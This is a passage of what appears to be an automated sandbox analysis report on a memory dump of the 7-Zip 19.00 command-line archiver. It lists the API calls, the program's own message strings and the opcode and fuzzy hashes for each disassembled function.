                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: \$\\?\$\\?\UNC\
                                                                                                                                                                                                                                • API String ID: 0-1962706685
                                                                                                                                                                                                                                • Opcode ID: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                                                                                                                • Instruction ID: 65ecc8042c32900f5c3ab15626ac86d5404cd119b56194a9be08718fdea0b2ce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05B19E2260964090CE20FF25E4911BEAB30EFA27D4F885113FE5E47779DF69CA86C752
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001D1C98
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001D1CB9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                                • Opcode ID: 9404618c4272822a705cb722a6b2e01a42813b165ea22c09ed02a541621bc0be
                                                                                                                                                                                                                                • Instruction ID: 81ca271f391331c2ceeda9c4fa938649af604858486d7f15b5a6a560719b48d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9404618c4272822a705cb722a6b2e01a42813b165ea22c09ed02a541621bc0be
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3A19032648644A5CB20EF15E49156EBB21E7F67D0F945113FBAE43B69DF38D88ACB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                                                                                                                                                                                                                • Instruction ID: af26d7431eb7af3c4aded57c5b7682fa7876106466700907838a60123b258e0f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03513027620A8489C721EE31D8912AA6331F7F6F98F5D8172EF2D1B759DF31D8528360
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$free$fputc
                                                                                                                                                                                                                                • String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
                                                                                                                                                                                                                                • API String ID: 2662072562-1527772849
                                                                                                                                                                                                                                • Opcode ID: cf38ecbc90f80cce91f4804fd03da9a44f36afd14dcff60acdae5e80679d7744
                                                                                                                                                                                                                                • Instruction ID: a73301d17fab737dcab2d61f4d24b1abfc56f279ea4fd0aed949762b21ffe4c3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf38ecbc90f80cce91f4804fd03da9a44f36afd14dcff60acdae5e80679d7744
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4517C7631454196CE20EF21E6983AE6322FBB9BD4F444226EE6E03B65DF3CC995C341
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                                                                                                                                                                                                                • Instruction ID: 71135aad3b726a37ff3c44642ad2313dfe4b0fc99e803f900715d4fff895704d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14716322215A8491CA20EF25E8917AEA730F7E27D0F545123FFAE577A9DF38C546CB10
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 0020187D
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrowfreemalloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2861928636-0
                                                                                                                                                                                                                                • Opcode ID: 715b52d3456352f88bffa419932dca49956056468a6bc82701705f4594a5e09d
                                                                                                                                                                                                                                • Instruction ID: c0ceb96d32e2bf76344d62161d95812848ba27a8b7d3598f6520c5dbfe5e591c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 715b52d3456352f88bffa419932dca49956056468a6bc82701705f4594a5e09d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53815C32219BC981CB60EF26E494BAE7764F7E6B84F159012DB9E53B16CF38C466C704
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                                                                                                                                                                                • Instruction ID: 1c629f4c45fa79ced25ac22c949bd4f0100ee6089e555a6747a4977f5f685703
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE31952261598485CA11BE36DD512AC6330EBF6F94F1D81B2EF3D5B769CF30E8928364
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID: 2$3$?$?$Z
                                                                                                                                                                                                                                • API String ID: 1534225298-3338962022
                                                                                                                                                                                                                                • Opcode ID: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                                                                                                                                                                                                                • Instruction ID: ba66db04d5481317e70e190d7ab8873b0475940c6fcd0be4e24afa8a21644117
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAC1B13223578292CF30DF25D48116EA731F7E5B84F518513EA9E43BAADB78C995CB01
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                                                                                                                                                                                                                • Instruction ID: 48cbb8c667e5010bd0be80fd8f50d20778783e6c80a90a9a259892eaffd6f9a4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62510A27702E8089CB25EE36D4A866D6320FBA6F95B1D4176DF2E1B718CF34C945C360
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$wcscmp
                                                                                                                                                                                                                                • String ID: ..\
                                                                                                                                                                                                                                • API String ID: 4021281200-2756224523
                                                                                                                                                                                                                                • Opcode ID: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                                                                                                                                                                                                                • Instruction ID: cbcec457b7010ae0d3ff9d7e7630f9c3846b86140d697000c5f0f4fc93e67f50
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49616D22725B8186CB20EF56E49021EB730FBE5B98F594122EF5E1B799DF78D802C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$free$fputc
                                                                                                                                                                                                                                • String ID: Modified: $Path: $Size:
                                                                                                                                                                                                                                • API String ID: 2662072562-3207571042
                                                                                                                                                                                                                                • Opcode ID: 496fa3ffaf823c2aebc81c865e07b2af86b11c6c8c3a8b9c12195a7aa1bd88ef
                                                                                                                                                                                                                                • Instruction ID: a7d235458411072b33cb3b43c1847765b0fd1c2f711f9c3ceb1bf97b3e025f25
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 496fa3ffaf823c2aebc81c865e07b2af86b11c6c8c3a8b9c12195a7aa1bd88ef
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F721327621494191DE10EF25FA983AE6321FBA5BE8F449222EE3D077A4DF38C55AC700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: b4b88fefa1dc8cc45d876b51e8a403cde685ba7d07cf5a0b4bc54341fa2cdd8b
                                                                                                                                                                                                                                • Instruction ID: 3097efebb60c6d92fbe1faf9b9416a3f1269bbd37c9aef342858036c34e03a55
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4b88fefa1dc8cc45d876b51e8a403cde685ba7d07cf5a0b4bc54341fa2cdd8b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7C18323318A95D2CB20EF25E49016EA770F7E9B80F944523EB9E57B69CF39C945CB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove$ExceptionThrow
                                                                                                                                                                                                                                • String ID: Incorrect volume size:
                                                                                                                                                                                                                                • API String ID: 3957182552-1799541332
                                                                                                                                                                                                                                • Opcode ID: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                                                                                                                                                                                                                • Instruction ID: 7d68c0b0398fc6caa8f43bf9d6f144b27e9215f8626a19a8a11adaae25039918
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1517E72204AC892DB25EF26D8903EDB320F7A9B84F448123DB9D47765DF78C995CB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: f4d9c5df7f8b7d7a50d10b176def1ac906b2dbe33b2ad29e85ea175187436e74
                                                                                                                                                                                                                                • Instruction ID: dc94b34f84b1768261f8c56d47a206fdbf5d295cd3af8c48884848dfb8282281
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4d9c5df7f8b7d7a50d10b176def1ac906b2dbe33b2ad29e85ea175187436e74
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E714032208E8081EB54EF26E8503AD6761FBA5BD4F484132EF6E877A5DF38C596C350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2
                                                                                                                                                                                                                                • free.MSVCRT ref: 001DA90A
                                                                                                                                                                                                                                • free.MSVCRT ref: 001DA9AD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID: /$\
                                                                                                                                                                                                                                • API String ID: 1534225298-1600464054
                                                                                                                                                                                                                                • Opcode ID: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                                                                                                                                                                                                                • Instruction ID: b3fbb9a66822be858a1b5f85cc3771fa5cb67242d0ae554dd6e2849e58540550
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89519622204640A1CE28FF25D59107D6730EFA67D4BC59223FBAE47765EF38CA46D712
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 00218630
                                                                                                                                                                                                                                • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 00218640
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$fputs$memmove
                                                                                                                                                                                                                                • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                                                                                                                                                                                • API String ID: 2337578458-4238946813
                                                                                                                                                                                                                                • Opcode ID: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                                                                                                                                                                                                                • Instruction ID: 2cab922f630bea807a0ce93e342ac921a784eb754be4bf87105fd56a645a263e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09113A723156C196CA20DF15E9C43AEB362F7A5B94F588022CB6D17718CF38D8A6C711
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 001DFFDA, 001E000E
                                                                                                                                                                                                                                • Cannot find listfile, xrefs: 001DFF12
                                                                                                                                                                                                                                • The file operation error for listfile, xrefs: 001DFF71
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ExceptionThrow
                                                                                                                                                                                                                                • String ID: Cannot find listfile$Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
                                                                                                                                                                                                                                • API String ID: 4001284683-1604901869
